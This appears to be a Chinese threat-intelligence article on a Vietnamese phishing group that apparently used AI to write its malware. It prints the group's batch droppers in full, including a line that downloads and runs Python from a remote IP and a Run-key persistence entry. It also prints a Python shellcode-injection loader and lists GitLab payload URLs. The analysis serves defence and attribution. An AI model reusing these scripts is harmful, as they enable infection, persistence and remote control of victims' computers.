一个位于越南的网络犯罪团伙似乎正在利用人工智能编写用于网络钓鱼活动的脚本,攻击者使用的多种工具都带有使用人工智能开发的显著特征,例如脚本中的详细注释和编号步骤,以及调试消息中对攻击者的指示。
攻击手法为钓鱼邮件伪装成招聘信息,该组织使用人工智能进一步证明,即使是技能水平较低的攻击者也在利用这项技术来开发工具并自动化攻击。
这批钓鱼邮件附件的批处理脚本中,有一个很可能是使用Ai编写的。
@echo offsetlocal enabledelayedexpansion:: Tạo thư mục ẩn nếu chưa tồn tạiset "targetDir=%LOCALAPPDATA%\\\\Google Chrome"if not exist "!targetDir!" (mkdir "!targetDir!"attrib +h +s "!targetDir!"):: Đổi tên file giả dạngren "document.pdf" "huna.zip" >nul 2>nulren "document.docx" "huna.exe" >nul 2>nul:: Giải nén zip bằng 7z hoặc tương đương"huna.exe" x "huna.zip" -p"huna@dev.vn" -o"!targetDir!" -y >nul 2>nul:: Dòng code Python cần chạyset "CODE=import requests,base64;exec(base64.b64decode(requests.get("http://196.251.86.145/huna2").text))":: Chạy zvchost.exe với đoạn mã Python (ẩn cửa sổ)start "" /b "!targetDir!\\\\zvchost.exe" -c "!CODE!":: Thêm vào Startup (escape toàn bộ chuỗi đúng cách)reg add "HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run" ^/v "ChromeUpdate" ^/d "\\\\"!targetDir!\\\\zvchost.exe\\\\" -c \\\\"!CODE!\\\\"" ^/f >nul 2>nul:: === THÊM: Tìm và chạy file .pdf trong thư mục đích ===for /f "delims=" %%F in ("dir "!targetDir!\\\\*.pdf" /a-d /b /s 2^>nul") do (echo Found PDF: "%%F"start "" "%%F"goto :after_pdf):after_pdf:: Trả lại tên file gốcren "huna.exe" "document.docx" >nul 2>nulren "huna.zip" "document.pdf" >nul 2>nulexit
批处理文件中几乎每个步骤都有详细的越南语注释。这种级别的注释在Ai编写的脚本之外非常罕见,尤其是在恶意文件中,恶意文件通常不包含注释或只有极少的注释。
该批处理文件的另一个版本包含更精简的指令集,并且有更多Ai辅助的迹象。
@echo offsetlocal enabledelayedexpansionset "targetDir=%LOCALAPPDATA%\\\\Google Chrome"set "exePath=!targetDir!\\\\zvchost.exe"if not exist "!targetDir!" (mkdir "!targetDir!" >nul 2>&1attrib +h +s "!targetDir!" >nul 2>&1)ren document.pdf huna.zip >nul 2>&1ren document.docx huna.exe >nul 2>&1huna.exe x huna.zip -p"huna@dev.vn" -o"!targetDir!" -y >nul 2>&1:: ✅ Kiểm tra tồn tạiif not exist "!exePath!" exit /b:: 🔥 CHẠY VỚI WORKING DIRECTORY ĐÚNGstart "" /min /D "!targetDir!" "!exePath!" huna:: Khôi phục tênren huna.exe document.docx >nul 2>&1ren huna.zip document.pdf >nul 2>&1
许多Ai编写工具倾向于在代码注释中插入表情符号,因为它们是使用来自 Reddit 等社交平台的数据进行训练的。
除了批处理脚本之外,一些用作最终payload加载器的 Python 代码示例很可能也是在人工智能的辅助下编写的。
以下是用于加载 HVNC 有效载荷的 Python 脚本摘录:
# === STEP 1: Base64 shellcode ===shellcode_b64 = "BASE64SHELLCODE (too large to be put here)"#NHỚdán shellcode base64 HVNC vào đâyif not shellcode_b64.strip():print("[-] Chưa có shellcode base64. Thêm vào biến shellcode_b64.")sys.exit(1)shellcode = base64.b64decode(shellcode_b64)# === STEP 2: Windows API constants ===CREATE_SUSPENDED = 0x4MEM_COMMIT = 0x1000PAGE_EXECUTE_READWRITE = 0x40PROCESS_ALL_ACCESS = 0x1F0FFFSTARTF_USESHOWWINDOW = 0x00000001SW_HIDE = 0# === STEP 3: Structs ===class STARTUPINFO(ctypes.Structure):fields = [("cb", wt.DWORD),("lpReserved", wt.LPWSTR),("lpDesktop", wt.LPWSTR),("lpTitle", wt.LPWSTR),("dwX", wt.DWORD),("dwY", wt.DWORD),("dwXSize", wt.DWORD),("dwYSize", wt.DWORD),("dwXCountChars", wt.DWORD),("dwYCountChars", wt.DWORD),("dwFillAttribute", wt.DWORD),("dwFlags", wt.DWORD),("wShowWindow", wt.WORD),("cbReserved2", wt.WORD),("lpReserved2", ctypes.POINTER(ctypes.c_byte)),("hStdInput", wt.HANDLE),("hStdOutput", wt.HANDLE),("hStdError", wt.HANDLE),]class PROCESS_INFORMATION(ctypes.Structure):fields = [("hProcess", wt.HANDLE),("hThread", wt.HANDLE),("dwProcessId", wt.DWORD),("dwThreadId", wt.DWORD),]# === STEP 4: Load API ===kernel32 = ctypes.windll.kernel32VirtualAllocEx = kernel32.VirtualAllocExWriteProcessMemory = kernel32.WriteProcessMemoryCreateRemoteThread = kernel32.CreateRemoteThreadCreateProcessW = kernel32.CreateProcessWResumeThread = kernel32.ResumeThreadCloseHandle = kernel32.CloseHandle# === STEP 5: Tạo tiến trình InstallUtil.exe ngầm (ẩn cửa sổ) ===target_path = r"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\InstallUtil.exe"if not os.path.exists(target_path):print("[-] Không tìm thấy đường dẫn InstallUtil.exe")sys.exit(1)startupinfo = STARTUPINFO()startupinfo.cb = ctypes.sizeof(startupinfo)startupinfo.dwFlags = STARTF_USESHOWWINDOWstartupinfo.wShowWindow = SW_HIDEprocess_info = PROCESS_INFORMATION()success = CreateProcessW(target_path, None, None, None, False,CREATE_SUSPENDED, None, None,ctypes.byref(startupinfo),ctypes.byref(process_info))if not success:print(f"[-] CreateProcessW failed with error: {kernel32.GetLastError()}")sys.exit(1)print(f"[+] Created suspended process PID: {process_info.dwProcessId}")# === STEP 6: Inject shellcode vào process mới ===addr = VirtualAllocEx(process_info.hProcess, None, len(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)if not addr:print("[-] VirtualAllocEx failed")sys.exit(1)written = ctypes.c_size_t(0)if not WriteProcessMemory(process_info.hProcess, addr, shellcode, len(shellcode), ctypes.byref(written)):print("[-] WriteProcessMemory failed")sys.exit(1)print(f"[+] Injected {written.value} bytes at address: 0x{addr:08X}")# === STEP 7: Chạy shellcode thông qua remote thread ===thread_handle = CreateRemoteThread(process_info.hProcess, None, 0, addr, None, 0, None)if not thread_handle:print("[-] CreateRemoteThread failed")sys.exit(1)print("[+] Shellcode is running inside InstallUtil.exe")# === STEP 8: Đóng handle (optional) ===CloseHandle(process_info.hThread)CloseHandle(process_info.hProcess)CloseHandle(thread_handle)
代码中的每一步都标有编号,并附有越南语和英语混合的解释性注释和调试信息。
代码甚至包含给攻击者的指示性注释,例如“记住把 base64 编码的 HVNC shellcode 粘贴到这里”。
除了代码中的越南语注释外,攻击者使用的三个密码中都出现了 @dev.vn
如“huna@dev.vn”、“hwan@dev.vn”和“hwanxkiem@dev.vn”。
Hwanxkiem 似乎是越南首都河内市Hoàn Kiếm区。
攻击者使用的一个文件名nvmeikxnawh.zip包含了 Hwanxkiem 的倒写形式。
攻击者使用的 GitLab 账号是该词的另一种形式,这次音节颠倒了:gitlab[.]com/kimxhwan。目前尚不清楚该账号的名称和用户名(Earlie Waverley 和 @earliewaverleyfb355)指的是什么。
https://gitlab[.]com/children157/mr-wolf/-/raw/main/mrwolf?inline=false
https://gitlab[.]com/hwan5471422/hwan/-/raw/main/Final_Doraemon?inline=false
https://gitlab[.]com/kimxhwan/kimxhwan/-/raw/main/kimxhwan?inline=false
攻击者在文件名和密码中反复使用“Huna”这个名字,它似乎与任何越南语单词都不对应,可能是攻击者使用的用户名。
对于脚本类恶意软件而言,最好的识别是否为Ai生成的方法就是用Ai去进行检测,这点需要大量Ai生成的实战化脚本去进行训练识别。
但目前黑鸟测试发现,有时候手动编写的脚本如果比较规范化,通过这个过程训练后,很容易被Ai误认为是Ai编写,必须要加入一些垃圾代码才能识别出是人工编写,个人认为这又是一个需要长期训练人工干预的过程,没有想象中那么容易攻防对等。
详细技术分析和IOC:
https://www.security.com/threat-intelligence/ai-purerat-phishing
https://www.trendmicro.com/en_us/research/25/l/valleyrat-campaign.html
声明:本文来自黑鸟,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如有侵权,请联系 anquanneican@163.com。
